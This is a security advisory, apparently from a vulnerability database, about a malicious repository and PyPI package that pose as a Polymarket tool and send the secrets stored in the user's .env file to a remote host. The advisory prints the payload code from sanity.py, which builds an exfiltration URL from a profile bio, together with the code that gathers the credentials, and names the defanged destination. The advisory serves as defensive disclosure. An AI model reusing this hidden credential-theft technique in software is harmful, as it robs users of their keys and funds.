VDB
GCVE-110-OSM-2026-3471
GCVE-110-OSM-2026-3471
Advisory PublishedCVSS 9.6/10
Malicious repository stealing credentials to Polymarket.
Users following the instructions from README will install a weaponized version of the project that exfiltrates content of the .env file (instructed to contain credentials to Polymarket service) to a remote target. The malicious code exists only in the release file, not in the repository directly. Similarly, the package published to PyPI also contained the malicious payload.
The repository owner account impersonates a real person using their name, location and profile picture from another social service but fails on other details.
The payload is hidden in the sanity.py (65a3e38400250e91cf0df10e089399d4bf0500b7d5678a0816c4ca4b1d7a2eef) and triggered via main.py (CLI handler) disguised as initial sanity checks. The check "_check_profiles" iterates over the number of hardcoded known addresses of allegedly popular Polymarket users and validates their profiles.
In malicious releases, the _validate_bio_sentence function attempts to build an exfiltration URL from the profile's bio and send data there:
```
if 'health' not in sentence:
return False
words = sentence.lower().split()
chunks_a = [words[0][:4], words[1][:6], words[2][:7], words[3][:3]]
chunks_b = "." + chunks_a[0] + chunks_a[1] + "." + chunks_a[2] + "." + chunks_a[3]
response = httpx.get(f"https://api-gateway{chunks_b}/api/v1/health", headers={"X-Correlation":config_combined})
```
The "config_combined" variable is filled earlier with data retrieved from the .env per configuration mechanism:
```
config_combined = "|".join([
config.POLY_PRIVATE_KEY,
config.POLY_API_KEY,
config.POLY_API_SECRET,
config.POLY_API_PASSPHRASE,
config.POLY_FUNDER,
str(config.POLY_SIGNATURE_TYPE),
config.BUILDER_API_KEY,
config.BUILDER_SECRET,
config.BUILDER_PASSPHRASE,
str(config.REDEEM_ENABLED),
config.TELEGRAM_BOT_TOKEN,
config.TELEGRAM_CHAT_ID,
])
```
The addresses list in the malicious releases contains 0x5194a5f5bceabdc955d1b2bd5ed150610316c1d7 which resolves to https://polymarket.com/@softcheery with the benign-looking bio "Node health workers develop reliable systems daily". Using this sentence the final exfiltration target is built: hxxps://api-gateway.nodehealth.workers[.]dev/api/v1/health
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | all (affected) | — |
References
Malicious package:
advisory
Browse GCVE Records
72,337 records in the GCVE database · Updated July 14, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.